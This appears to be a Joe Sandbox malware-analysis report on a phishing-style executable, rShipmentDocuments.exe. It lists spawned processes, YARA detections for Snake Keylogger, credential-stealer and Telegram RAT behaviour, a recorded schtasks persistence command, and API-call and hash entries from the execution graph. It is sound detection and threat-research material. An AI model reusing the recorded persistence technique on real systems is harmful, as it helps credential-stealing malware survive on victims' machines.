                                                    Target ID:8
                                                    Start time:03:35:14
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0x170000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:03:35:14
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\rShipmentDocuments.exe"
                                                    Imagebase:0x8b0000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:03:35:14
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Imagebase:0x350000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 29%, ReversingLabs
                                                     • Detection: 38%, Virustotal
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:03:35:16
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff693ab0000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                                                    Imagebase:0x380000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0x410000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0x190000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:03:35:17
                                                    Start date:11/10/2024
                                                    Path:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                                                    Imagebase:0xd20000
                                                    File size:731'136 bytes
                                                    MD5 hash:FF8C4AB4EC18F05864879323F4A41050
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false


                                                      Execution Graph

                                                      Execution Coverage:9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:59
                                                      Total number of Limit Nodes:10

                                                      Control-flow Graph (graph image omitted; function spans 177d4a9-177d685)
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D536
                                                      • GetCurrentThread.KERNEL32 ref: 0177D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0177D609
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 991debcfd7a80be31a1e22bcee6d653f8496fce9f365985bce372796c34e0e2d
                                                      • Instruction ID: b7c8d715b41d3b9b674588a4561f6de95e9611f90d5b8b55b268c314feef6acf
                                                      • Opcode Fuzzy Hash: 991debcfd7a80be31a1e22bcee6d653f8496fce9f365985bce372796c34e0e2d
                                                      • Instruction Fuzzy Hash: 7B5145B09043498FDB18DFA9D548B9EFFF1EF48314F248069E459A7260D7349984CF66

                                                      Control-flow Graph (graph image omitted; function spans 177d4b8-177d685)
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D536
                                                      • GetCurrentThread.KERNEL32 ref: 0177D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0177D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0177D609
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: b7786682cb64cb9144fdc05fbde6f1451e7a7f3ee434ddef3bc57ee9cc75ba4a
                                                      • Instruction ID: 34f3eabe0acbcdab9c7144d741a2403418c1497549ffa93bc55c05f0ba473951
                                                      • Opcode Fuzzy Hash: b7786682cb64cb9144fdc05fbde6f1451e7a7f3ee434ddef3bc57ee9cc75ba4a
                                                      • Instruction Fuzzy Hash: 245136B09003098FDB14DFA9D548B9EFBF1EF88314F208469E459A7360D7349984CF65

                                                      Control-flow Graph (graph image omitted; function spans 177b230-177b4b0)
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0177B486
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 369cda6af3dc7332b6b3191866c9d17d5fc55b314f6948abf0acb0c07b6843a2
                                                      • Instruction ID: 3cd2b4351672a03cb2a4012209aa4e591c92e6888a85d4e25ac3251b5088d0e4
                                                      • Opcode Fuzzy Hash: 369cda6af3dc7332b6b3191866c9d17d5fc55b314f6948abf0acb0c07b6843a2
                                                      • Instruction Fuzzy Hash: 99812470A00B458FEB24DF69D44475AFBF1FF88304F048A29D48ADBA54D774E945CB91

                                                      Control-flow Graph (graph image omitted; function spans 1774610-1775f99)
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01775F01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 2c08a6bbba47e429a6b86f7887c70686e184fdfa7ffbc15c0f77bd124e32521b
                                                      • Instruction ID: 4847947fe7dbce6eff704407e111219044a48c4804e662c5aeaf2bfaf694d1d0
                                                      • Opcode Fuzzy Hash: 2c08a6bbba47e429a6b86f7887c70686e184fdfa7ffbc15c0f77bd124e32521b
                                                      • Instruction Fuzzy Hash: 8341E0B0C0071DCEDB24CFA9C944B9DFBB5BF48304F2480AAE408AB255DB756985CF91

                                                      Control-flow Graph (graph image omitted; function spans 1775e44-1775f99)
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01775F01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: d555fc707ec5180125920b4849def1bb57b621a248fd5d78b9405e7260eb6eac
                                                      • Instruction ID: 73bdb63cbce75b46d3c3e02fa01c5244e67819f07dfc22a116739303f778b2e6
                                                      • Opcode Fuzzy Hash: d555fc707ec5180125920b4849def1bb57b621a248fd5d78b9405e7260eb6eac
                                                      • Instruction Fuzzy Hash: 7A41DDB0C0071DCEDB24DFA9C94478DFBB5BF49304F2484AAE408AB265DBB56985CF91

                                                      Control-flow Graph (graph image omitted; function spans 58d4590-58d4662)
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,058D457D,?,?), ref: 058D462F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 7ced4229a7df59f0fa35decb13ab51b431d833beccd2519b5bfa810eadbbf194
                                                      • Instruction ID: cff265fe613954620b7314055927acfe4577d67ed2d0fae302e7b92781b25667
                                                      • Opcode Fuzzy Hash: 7ced4229a7df59f0fa35decb13ab51b431d833beccd2519b5bfa810eadbbf194
                                                      • Instruction Fuzzy Hash: F431F1B59012499FDB10CF9AD884ADEFBF5FF58320F14842AE819A7320D775A944CFA0

                                                      Control-flow Graph (graph image omitted; function spans 58d2f9c-58d4662)
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,058D457D,?,?), ref: 058D462F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 03ed62dfe71eb348ab148eb202b796292d6f3b10364eb3aa498ff780106661e0
                                                      • Instruction ID: 6f6617c88bee9478484b6c68a8ba76e69bf2c554d258d1f9e71e482a140fa759
                                                      • Opcode Fuzzy Hash: 03ed62dfe71eb348ab148eb202b796292d6f3b10364eb3aa498ff780106661e0
                                                      • Instruction Fuzzy Hash: E531E2B59042099FDB10CF9AD884A9EFBF5FB48310F14842AE919A7220D775A944CFA4

                                                      Control-flow Graph (graph image omitted; function spans 58d4553-58d4662)
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,058D457D,?,?), ref: 058D462F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 83333fe992255c84a1b341537eb54680763a93fa7cfac28f277194cde1dfaf86
                                                      • Instruction ID: 6d67d5b04bbeb56150fefd2216355960fb99ab24193450863829a2402fea6184
                                                      • Opcode Fuzzy Hash: 83333fe992255c84a1b341537eb54680763a93fa7cfac28f277194cde1dfaf86
                                                      • Instruction Fuzzy Hash: 372159B6900209AFDF11CF99D844ADEBBF5FF48320F18801AE919E7220C771D951CBA0

                                                      Control-flow Graph (graph image omitted; function spans 177d6f8-177d7ba)
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D787
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 2c50687c5f2d757fb570cc57354a70b8b7898a6b211833918568e04e96aac8a0
                                                      • Instruction ID: 1539602acf51b1917a8688df35f30c0347738d1f2b80141d555f78f905b1d76a
                                                      • Opcode Fuzzy Hash: 2c50687c5f2d757fb570cc57354a70b8b7898a6b211833918568e04e96aac8a0
                                                      • Instruction Fuzzy Hash: 2721E5B5900258AFDB10CFAAD984ADEFFF5EF48310F14801AE914A7310D374A954CFA5

                                                      Control-flow Graph (graph image omitted; function spans 177d700-177d7ba)
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D787
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: eef7a6b018aca461ebabfbf33742f6928f1dcdb657ea819c90f3a57dd25513d2
                                                      • Instruction ID: 5d0044c82024c6938109e0d53be6e9f652713cb1b4178dacc91fb8d3672c97be
                                                      • Opcode Fuzzy Hash: eef7a6b018aca461ebabfbf33742f6928f1dcdb657ea819c90f3a57dd25513d2
                                                      • Instruction Fuzzy Hash: 7D21C4B59002589FDB10CFAAD984ADEFFF5EB48310F14841AE958B7350D374A944CFA5
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0177B486
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 989fea11290ec9f1485d61ddaec973eeea2d995267b40fc49df8cecf0f4d3f40
                                                      • Instruction ID: f69dac225875700baab5283291ea20ff72d7f91646ae40aaac05b4543131bbbf
                                                      • Opcode Fuzzy Hash: 989fea11290ec9f1485d61ddaec973eeea2d995267b40fc49df8cecf0f4d3f40
                                                      • Instruction Fuzzy Hash: 1911E0B5C003498FDB14DF9AC444ADEFBF4EB89324F10842AD559B7210C375A545CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28df0b5839419f8587d7e5ff6936605a1a3c0cb2cc3b6c0b2755c47f39dd4fea
                                                      • Instruction ID: 88a822d771ad8935d7f089ae309f5e288252fdb2152c4484e094fdd691e20af3
                                                      • Opcode Fuzzy Hash: 28df0b5839419f8587d7e5ff6936605a1a3c0cb2cc3b6c0b2755c47f39dd4fea
                                                      • Instruction Fuzzy Hash: 9B2136B1140200DFDB25DF88D9C8B56FF65FB88314F20C1A9ED090B25AC336E446CAA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cb72d358fb08c18be749e5f14ac023274d44c430549878516a71c2bd05d6861
                                                      • Instruction ID: f979e712f93929eb27c1f443d0543b6bd8f644f06917d0e0175071f695950fba
                                                      • Opcode Fuzzy Hash: 4cb72d358fb08c18be749e5f14ac023274d44c430549878516a71c2bd05d6861
                                                      • Instruction Fuzzy Hash: 49210371500240DFDB25DF5CD9C8B26FF65FB88318F30C5A9E9090B25AC336D456CAA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f95674fcd30531e3ef84765d39f2a6a86f2f538d68dd09ff1d90f1402b0f0569
                                                      • Instruction ID: fc4dddc7ee945f24f0ec8b3b3b271c5516510d27bfc06954a2b3232533aec66b
                                                      • Opcode Fuzzy Hash: f95674fcd30531e3ef84765d39f2a6a86f2f538d68dd09ff1d90f1402b0f0569
                                                      • Instruction Fuzzy Hash: 16212671508200EFDB25DF98D9C4B26FBE5FB89324F20C6ADE9098B256C336D447CA61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dff93752d53a54ea68ca9863d34d694b00a5dfe1225df37578347f11b3a82f19
                                                      • Instruction ID: 345a5f97249c062dad9a470ed791c7654215084d1810e21af9334c486e17a2be
                                                      • Opcode Fuzzy Hash: dff93752d53a54ea68ca9863d34d694b00a5dfe1225df37578347f11b3a82f19
                                                      • Instruction Fuzzy Hash: 8C212271604240DFCB35DF98D9C4B26FFA5EB88314F20C5ADD90A4B2A6C33AD447CA61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: 379c7830f2362e129389306a6e719d3f37ca641c40e4bfdeb21f02f76c39122a
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: 8611AF76504280CFDB16CF58D5C4B16FF72FB84318F24C6A9D9490B65AC336D45ACBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727439582.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_171d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: 2e9c8eb70add51688afd0c8c4ac93d2c862ab6d785ebb4a09fb3b92661334dbf
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: B911CD72444240CFDB16CF48D5C4B56BF62FB94224F24C6A9DD090A25AC33AE45ACBA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: 6dda2efb86ea8ea6be7353b0bec10821f913f0c565bba2bf9fbd7b8669d5346c
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: C911D075504280CFDB22CF54D5C4B15FF61FB44314F24C6AAD8494B666C33AD40BCB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727503411.000000000172D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0172D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_172d000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: 19b65c7c97821a56a05ef4f24630e059c34183730f08b5e834745d395539e84f
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 9211BB75508280DFDB12CF54C5C4B15FFA1FB85224F24C6AAD8498B296C33AD40ACB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79d799e7775335bc403a0def0d622c1134bf2e908f511c588cf4cf5969c4695f
                                                      • Instruction ID: 8baa7abf8a130cb16bf100a4889c77f4924fb5cd96c713dd0dfebded62467a6d
                                                      • Opcode Fuzzy Hash: 79d799e7775335bc403a0def0d622c1134bf2e908f511c588cf4cf5969c4695f
                                                      • Instruction Fuzzy Hash: C7D1F831D2065A8ACB00EBA8D994A9DF771FFD5300F50C79AE4497B214FB706AC9CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1727777768.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1770000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 544d27a0f5ba563e0798917aee2e286140cf32c9260eba26d9d5cceb077167cf
                                                      • Instruction ID: c71beafbebb68326d893ba3d5d369f7aa0caa333bbae635e965ea9db54d74b9c
                                                      • Opcode Fuzzy Hash: 544d27a0f5ba563e0798917aee2e286140cf32c9260eba26d9d5cceb077167cf
                                                      • Instruction Fuzzy Hash: 20A15E32A00216CFCF15DFB8C94459EF7B2FF85300F2585AAE915AB225DB31E955CB50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c0c1e0c07539f785e97a4d990e7ab270d6b5a4413827f5b31a4d710168ad41a
                                                      • Instruction ID: 9611fa27352d53035792362f0ffa509dad7cc51527575e886a3c99941a5aca1b
                                                      • Opcode Fuzzy Hash: 8c0c1e0c07539f785e97a4d990e7ab270d6b5a4413827f5b31a4d710168ad41a
                                                      • Instruction Fuzzy Hash: 19D1F831D2065A8ACB00EBA8D994A9DF7B1FFD5300F50C79AE5493B214FB706AC5CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1731446096.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_58d0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50719ac09746ce2d62af6946f4224732a010a3c60bd1495459e604082100b523
                                                      • Instruction ID: 7bfe2198c500c80ac1efa1fafdef265caedc7a0a2c792d6dc7ad39b5070a2a5b
                                                      • Opcode Fuzzy Hash: 50719ac09746ce2d62af6946f4224732a010a3c60bd1495459e604082100b523
                                                      • Instruction Fuzzy Hash: 18415A70E0520A9FCB04CFA9E5445AEFBF2FF88344F10956AD811E7264E7749A01CF55

                                                      Execution Graph

                                                      Execution Coverage:16.3%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:27.3%
                                                      Total number of Nodes:44
                                                      Total number of Limit Nodes:9

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
